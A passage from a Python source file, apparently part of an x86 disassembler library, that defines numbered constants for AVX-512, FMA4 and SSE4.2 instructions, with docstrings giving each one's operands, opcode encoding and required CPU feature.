``VRANGEPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 50 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGEPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8_SAE: int = 3936
"""
``VRANGEPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 50 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3937
"""
``VRANGESS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 51 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VRANGESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3938
"""
``VRANGESD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 51 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPS_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 3939
"""
``VFIXUPIMMPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 54 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPS_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 3940
"""
``VFIXUPIMMPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 54 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPS_ZMM_K1Z_ZMM_ZMMM512B32_IMM8_SAE: int = 3941
"""
``VFIXUPIMMPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 54 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPD_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 3942
"""
``VFIXUPIMMPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 54 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPD_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 3943
"""
``VFIXUPIMMPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 54 /r ib``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMPD_ZMM_K1Z_ZMM_ZMMM512B64_IMM8_SAE: int = 3944
"""
``VFIXUPIMMPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 54 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMSS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3945
"""
``VFIXUPIMMSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 55 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VFIXUPIMMSD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3946
"""
``VFIXUPIMMSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 55 /r ib``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VREDUCEPS_XMM_K1Z_XMMM128B32_IMM8: int = 3947
"""
``VREDUCEPS xmm1 {k1}{z}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 56 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPS_YMM_K1Z_YMMM256B32_IMM8: int = 3948
"""
``VREDUCEPS ymm1 {k1}{z}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 56 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPS_ZMM_K1Z_ZMMM512B32_IMM8_SAE: int = 3949
"""
``VREDUCEPS zmm1 {k1}{z}, zmm2/m512/m32bcst{sae}, imm8``
``EVEX.512.66.0F3A.W0 56 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPD_XMM_K1Z_XMMM128B64_IMM8: int = 3950
"""
``VREDUCEPD xmm1 {k1}{z}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 56 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPD_YMM_K1Z_YMMM256B64_IMM8: int = 3951
"""
``VREDUCEPD ymm1 {k1}{z}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 56 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCEPD_ZMM_K1Z_ZMMM512B64_IMM8_SAE: int = 3952
"""
``VREDUCEPD zmm1 {k1}{z}, zmm2/m512/m64bcst{sae}, imm8``
``EVEX.512.66.0F3A.W1 56 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCESS_XMM_K1Z_XMM_XMMM32_IMM8_SAE: int = 3953
"""
``VREDUCESS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}, imm8``
``EVEX.LIG.66.0F3A.W0 57 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VREDUCESD_XMM_K1Z_XMM_XMMM64_IMM8_SAE: int = 3954
"""
``VREDUCESD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}, imm8``
``EVEX.LIG.66.0F3A.W1 57 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_VFMADDSUBPS_XMM_XMM_XMMM128_XMM: int = 3955
"""
``VFMADDSUBPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 5C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPS_YMM_YMM_YMMM256_YMM: int = 3956
"""
``VFMADDSUBPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 5C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPS_XMM_XMM_XMM_XMMM128: int = 3957
"""
``VFMADDSUBPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 5C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPS_YMM_YMM_YMM_YMMM256: int = 3958
"""
``VFMADDSUBPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 5C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPD_XMM_XMM_XMMM128_XMM: int = 3959
"""
``VFMADDSUBPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 5D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPD_YMM_YMM_YMMM256_YMM: int = 3960
"""
``VFMADDSUBPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 5D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPD_XMM_XMM_XMM_XMMM128: int = 3961
"""
``VFMADDSUBPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 5D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSUBPD_YMM_YMM_YMM_YMMM256: int = 3962
"""
``VFMADDSUBPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 5D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPS_XMM_XMM_XMMM128_XMM: int = 3963
"""
``VFMSUBADDPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 5E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPS_YMM_YMM_YMMM256_YMM: int = 3964
"""
``VFMSUBADDPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 5E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPS_XMM_XMM_XMM_XMMM128: int = 3965
"""
``VFMSUBADDPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 5E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPS_YMM_YMM_YMM_YMMM256: int = 3966
"""
``VFMSUBADDPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 5E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPD_XMM_XMM_XMMM128_XMM: int = 3967
"""
``VFMSUBADDPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 5F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPD_YMM_YMM_YMMM256_YMM: int = 3968
"""
``VFMSUBADDPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 5F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPD_XMM_XMM_XMM_XMMM128: int = 3969
"""
``VFMSUBADDPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 5F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBADDPD_YMM_YMM_YMM_YMMM256: int = 3970
"""
``VFMSUBADDPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 5F /r /is4``
``FMA4``
``16/32/64-bit``
"""
PCMPESTRM_XMM_XMMM128_IMM8: int = 3971
"""
``PCMPESTRM xmm1, xmm2/m128, imm8``
``66 0F 3A 60 /r ib``
``SSE4.2``
``16/32/64-bit``
"""
PCMPESTRM64_XMM_XMMM128_IMM8: int = 3972
"""
``PCMPESTRM64 xmm1, xmm2/m128, imm8``
``66 o64 0F 3A 60 /r ib``
``SSE4.2``
``64-bit``
"""
VEX_VPCMPESTRM_XMM_XMMM128_IMM8: int = 3973
"""
``VPCMPESTRM xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W0 60 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPESTRM64_XMM_XMMM128_IMM8: int = 3974
"""
``VPCMPESTRM64 xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W1 60 /r ib``
``AVX``
``64-bit``
"""
PCMPESTRI_XMM_XMMM128_IMM8: int = 3975
"""
``PCMPESTRI xmm1, xmm2/m128, imm8``
``66 0F 3A 61 /r ib``
``SSE4.2``
``16/32/64-bit``
"""
PCMPESTRI64_XMM_XMMM128_IMM8: int = 3976
"""
``PCMPESTRI64 xmm1, xmm2/m128, imm8``
``66 o64 0F 3A 61 /r ib``
``SSE4.2``
``64-bit``
"""
VEX_VPCMPESTRI_XMM_XMMM128_IMM8: int = 3977
"""
``VPCMPESTRI xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W0 61 /r ib``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPESTRI64_XMM_XMMM128_IMM8: int = 3978
"""
``VPCMPESTRI64 xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.W1 61 /r ib``
``AVX``
``64-bit``
"""
PCMPISTRM_XMM_XMMM128_IMM8: int = 3979
"""
``PCMPISTRM xmm1, xmm2/m128, imm8``
``66 0F 3A 62 /r ib``
``SSE4.2``
``16/32/64-bit``
"""
VEX_VPCMPISTRM_XMM_XMMM128_IMM8: int = 3980
"""
``VPCMPISTRM xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG 62 /r ib``
``AVX``
``16/32/64-bit``
"""
PCMPISTRI_XMM_XMMM128_IMM8: int = 3981
"""
``PCMPISTRI xmm1, xmm2/m128, imm8``
``66 0F 3A 63 /r ib``
``SSE4.2``
``16/32/64-bit``
"""
VEX_VPCMPISTRI_XMM_XMMM128_IMM8: int = 3982
"""
``VPCMPISTRI xmm1, xmm2/m128, imm8``
``VEX.128.66.0F3A.WIG 63 /r ib``
``AVX``
``16/32/64-bit``
"""
EVEX_VFPCLASSPS_KR_K1_XMMM128B32_IMM8: int = 3983
"""
``VFPCLASSPS k2 {k1}, xmm2/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 66 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPS_KR_K1_YMMM256B32_IMM8: int = 3984
"""
``VFPCLASSPS k2 {k1}, ymm2/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 66 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPS_KR_K1_ZMMM512B32_IMM8: int = 3985
"""
``VFPCLASSPS k2 {k1}, zmm2/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 66 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPD_KR_K1_XMMM128B64_IMM8: int = 3986
"""
``VFPCLASSPD k2 {k1}, xmm2/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 66 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPD_KR_K1_YMMM256B64_IMM8: int = 3987
"""
``VFPCLASSPD k2 {k1}, ymm2/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 66 /r ib``
``AVX512VL and AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSPD_KR_K1_ZMMM512B64_IMM8: int = 3988
"""
``VFPCLASSPD k2 {k1}, zmm2/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 66 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSSS_KR_K1_XMMM32_IMM8: int = 3989
"""
``VFPCLASSSS k2 {k1}, xmm2/m32, imm8``
``EVEX.LIG.66.0F3A.W0 67 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
EVEX_VFPCLASSSD_KR_K1_XMMM64_IMM8: int = 3990
"""
``VFPCLASSSD k2 {k1}, xmm2/m64, imm8``
``EVEX.LIG.66.0F3A.W1 67 /r ib``
``AVX512DQ``
``16/32/64-bit``
"""
VEX_VFMADDPS_XMM_XMM_XMMM128_XMM: int = 3991
"""
``VFMADDPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 68 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPS_YMM_YMM_YMMM256_YMM: int = 3992
"""
``VFMADDPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 68 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPS_XMM_XMM_XMM_XMMM128: int = 3993
"""
``VFMADDPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 68 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPS_YMM_YMM_YMM_YMMM256: int = 3994
"""
``VFMADDPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 68 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPD_XMM_XMM_XMMM128_XMM: int = 3995
"""
``VFMADDPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 69 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPD_YMM_YMM_YMMM256_YMM: int = 3996
"""
``VFMADDPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 69 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPD_XMM_XMM_XMM_XMMM128: int = 3997
"""
``VFMADDPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 69 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDPD_YMM_YMM_YMM_YMMM256: int = 3998
"""
``VFMADDPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 69 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSS_XMM_XMM_XMMM32_XMM: int = 3999
"""
``VFMADDSS xmm1, xmm2, xmm3/m32, xmm4``
``VEX.LIG.66.0F3A.W0 6A /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSS_XMM_XMM_XMM_XMMM32: int = 4000
"""
``VFMADDSS xmm1, xmm2, xmm3, xmm4/m32``
``VEX.LIG.66.0F3A.W1 6A /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSD_XMM_XMM_XMMM64_XMM: int = 4001
"""
``VFMADDSD xmm1, xmm2, xmm3/m64, xmm4``
``VEX.LIG.66.0F3A.W0 6B /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMADDSD_XMM_XMM_XMM_XMMM64: int = 4002
"""
``VFMADDSD xmm1, xmm2, xmm3, xmm4/m64``
``VEX.LIG.66.0F3A.W1 6B /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPS_XMM_XMM_XMMM128_XMM: int = 4003
"""
``VFMSUBPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 6C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPS_YMM_YMM_YMMM256_YMM: int = 4004
"""
``VFMSUBPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 6C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPS_XMM_XMM_XMM_XMMM128: int = 4005
"""
``VFMSUBPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 6C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPS_YMM_YMM_YMM_YMMM256: int = 4006
"""
``VFMSUBPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 6C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPD_XMM_XMM_XMMM128_XMM: int = 4007
"""
``VFMSUBPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 6D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPD_YMM_YMM_YMMM256_YMM: int = 4008
"""
``VFMSUBPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 6D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPD_XMM_XMM_XMM_XMMM128: int = 4009
"""
``VFMSUBPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 6D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBPD_YMM_YMM_YMM_YMMM256: int = 4010
"""
``VFMSUBPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 6D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBSS_XMM_XMM_XMMM32_XMM: int = 4011
"""
``VFMSUBSS xmm1, xmm2, xmm3/m32, xmm4``
``VEX.LIG.66.0F3A.W0 6E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBSS_XMM_XMM_XMM_XMMM32: int = 4012
"""
``VFMSUBSS xmm1, xmm2, xmm3, xmm4/m32``
``VEX.LIG.66.0F3A.W1 6E /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBSD_XMM_XMM_XMMM64_XMM: int = 4013
"""
``VFMSUBSD xmm1, xmm2, xmm3/m64, xmm4``
``VEX.LIG.66.0F3A.W0 6F /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFMSUBSD_XMM_XMM_XMM_XMMM64: int = 4014
"""
``VFMSUBSD xmm1, xmm2, xmm3, xmm4/m64``
``VEX.LIG.66.0F3A.W1 6F /r /is4``
``FMA4``
``16/32/64-bit``
"""
EVEX_VPSHLDW_XMM_K1Z_XMM_XMMM128_IMM8: int = 4015
"""
``VPSHLDW xmm1 {k1}{z}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W1 70 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDW_YMM_K1Z_YMM_YMMM256_IMM8: int = 4016
"""
``VPSHLDW ymm1 {k1}{z}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W1 70 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 4017
"""
``VPSHLDW zmm1 {k1}{z}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W1 70 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 4018
"""
``VPSHLDD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 71 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 4019
"""
``VPSHLDD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 71 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 4020
"""
``VPSHLDD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 71 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4021
"""
``VPSHLDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 71 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4022
"""
``VPSHLDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 71 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHLDQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4023
"""
``VPSHLDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 71 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDW_XMM_K1Z_XMM_XMMM128_IMM8: int = 4024
"""
``VPSHRDW xmm1 {k1}{z}, xmm2, xmm3/m128, imm8``
``EVEX.128.66.0F3A.W1 72 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDW_YMM_K1Z_YMM_YMMM256_IMM8: int = 4025
"""
``VPSHRDW ymm1 {k1}{z}, ymm2, ymm3/m256, imm8``
``EVEX.256.66.0F3A.W1 72 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDW_ZMM_K1Z_ZMM_ZMMM512_IMM8: int = 4026
"""
``VPSHRDW zmm1 {k1}{z}, zmm2, zmm3/m512, imm8``
``EVEX.512.66.0F3A.W1 72 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDD_XMM_K1Z_XMM_XMMM128B32_IMM8: int = 4027
"""
``VPSHRDD xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst, imm8``
``EVEX.128.66.0F3A.W0 73 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDD_YMM_K1Z_YMM_YMMM256B32_IMM8: int = 4028
"""
``VPSHRDD ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst, imm8``
``EVEX.256.66.0F3A.W0 73 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDD_ZMM_K1Z_ZMM_ZMMM512B32_IMM8: int = 4029
"""
``VPSHRDD zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst, imm8``
``EVEX.512.66.0F3A.W0 73 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDQ_XMM_K1Z_XMM_XMMM128B64_IMM8: int = 4030
"""
``VPSHRDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst, imm8``
``EVEX.128.66.0F3A.W1 73 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDQ_YMM_K1Z_YMM_YMMM256B64_IMM8: int = 4031
"""
``VPSHRDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst, imm8``
``EVEX.256.66.0F3A.W1 73 /r ib``
``AVX512VL and AVX512_VBMI2``
``16/32/64-bit``
"""
EVEX_VPSHRDQ_ZMM_K1Z_ZMM_ZMMM512B64_IMM8: int = 4032
"""
``VPSHRDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst, imm8``
``EVEX.512.66.0F3A.W1 73 /r ib``
``AVX512_VBMI2``
``16/32/64-bit``
"""
VEX_VFNMADDPS_XMM_XMM_XMMM128_XMM: int = 4033
"""
``VFNMADDPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 78 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPS_YMM_YMM_YMMM256_YMM: int = 4034
"""
``VFNMADDPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 78 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPS_XMM_XMM_XMM_XMMM128: int = 4035
"""
``VFNMADDPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 78 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPS_YMM_YMM_YMM_YMMM256: int = 4036
"""
``VFNMADDPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 78 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPD_XMM_XMM_XMMM128_XMM: int = 4037
"""
``VFNMADDPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 79 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPD_YMM_YMM_YMMM256_YMM: int = 4038
"""
``VFNMADDPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 79 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPD_XMM_XMM_XMM_XMMM128: int = 4039
"""
``VFNMADDPD xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 79 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDPD_YMM_YMM_YMM_YMMM256: int = 4040
"""
``VFNMADDPD ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 79 /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDSS_XMM_XMM_XMMM32_XMM: int = 4041
"""
``VFNMADDSS xmm1, xmm2, xmm3/m32, xmm4``
``VEX.LIG.66.0F3A.W0 7A /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDSS_XMM_XMM_XMM_XMMM32: int = 4042
"""
``VFNMADDSS xmm1, xmm2, xmm3, xmm4/m32``
``VEX.LIG.66.0F3A.W1 7A /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDSD_XMM_XMM_XMMM64_XMM: int = 4043
"""
``VFNMADDSD xmm1, xmm2, xmm3/m64, xmm4``
``VEX.LIG.66.0F3A.W0 7B /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMADDSD_XMM_XMM_XMM_XMMM64: int = 4044
"""
``VFNMADDSD xmm1, xmm2, xmm3, xmm4/m64``
``VEX.LIG.66.0F3A.W1 7B /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPS_XMM_XMM_XMMM128_XMM: int = 4045
"""
``VFNMSUBPS xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 7C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPS_YMM_YMM_YMMM256_YMM: int = 4046
"""
``VFNMSUBPS ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 7C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPS_XMM_XMM_XMM_XMMM128: int = 4047
"""
``VFNMSUBPS xmm1, xmm2, xmm3, xmm4/m128``
``VEX.128.66.0F3A.W1 7C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPS_YMM_YMM_YMM_YMMM256: int = 4048
"""
``VFNMSUBPS ymm1, ymm2, ymm3, ymm4/m256``
``VEX.256.66.0F3A.W1 7C /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPD_XMM_XMM_XMMM128_XMM: int = 4049
"""
``VFNMSUBPD xmm1, xmm2, xmm3/m128, xmm4``
``VEX.128.66.0F3A.W0 7D /r /is4``
``FMA4``
``16/32/64-bit``
"""
VEX_VFNMSUBPD_YMM_YMM_YMMM256_YMM: int = 4050
"""
``VFNMSUBPD ymm1, ymm2, ymm3/m256, ymm4``
``VEX.256.66.0F3A.W0 7D /r /is4``
``FMA4``
``16/32/64-bit``
"""
